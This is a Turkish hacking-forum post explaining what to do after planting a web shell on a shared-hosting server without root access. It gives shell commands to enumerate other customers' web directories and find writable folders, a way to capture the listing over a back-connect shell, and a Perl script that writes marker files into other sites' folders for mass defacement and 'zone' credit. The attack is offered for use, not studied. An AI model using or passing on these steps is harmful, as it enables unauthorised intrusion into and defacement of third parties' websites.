Hack Üzerine bir Kaç Taktik

  • Konuyu başlatan TheWayEnd
  • Başlangıç tarihi
T

TheWayEnd

NOT:Yazı Uzun demeyin okuyun... :)

Evet Arkadaşalar Bu yazım Bana özel alıntı değildir.

Aşağıdaki yazdıklarımı bilmeyenler olabilir.Bir faydam olsun.

Bir Siteye shell attınız fakat root olamadınız.Maalesef bu tür durumlarda hemen index basılıp server ziyan ediliyor.

Shell atıldıktan sonra root olamadıysanız denenecek yöntemler ile server kontrol edilmeli..
Safe Mod: OFF olmalı

1.Aşama

Bulunduğumuz dizin /home/siteveyauseradı/public_html diyelim
/home dizinine muhtemelen geçilemez.Diğer siteleri görmek için

ls -la /home/*/public html yazıcaz komut satırına permissionlu olarak listeler eğer güvenlik yoksa

Aşağıdaki komut daha detaylı listeler ve yazma izinleri olan klasörleri görürsünüz.

ls -la /home/*/public_html/*/

NOT:Bazı serverlarda komut satırında yazdığınızda listelemez fakat back connect bağlandısında listeler.Bunun için back connectten sonra şunu yaparak listeyi çekin.

ls -la /home/*/public_html/*/> /home/siteveyauseradı/public_html/twe.txt

yukardaki kodla permissionlu olarak tüm listeyi shellin bulunduğu yere twe.txt olarak yazdırdık.

2.Aşama

Şimdi burda bir perl yazıp 5 sn bütün açık olan klasörlere basalım

{
system("echo By TheWayEnd > /home/site1/public_html/server/twe.txt");
system("echo By TheWayEnd > /home/site2/public_html/images/twe.txt");
system("echo By TheWayEnd > /home/site3/public_html/modules/twe.txt");
system("echo By TheWayEnd > /home/site4/public_html/images/twe.txt");
}

bu perl dosyasını shellin bulunduğu dizine atalım twe.pl gibi

back connectte perl twe.pl yazıp enter deyin işlem tamamdır.

sonra alın zoneleri gitsin.

Bu arada bazı serverlarda yazma izni olsada upload izni vermez işte burda Echo komutu kesin çözümdür.

TheWayEnd Spyhackerz.com
 
131,535Konular
3,269,056Mesajlar
315,362Kullanıcılar
Harun beySon Üye
Üst Alt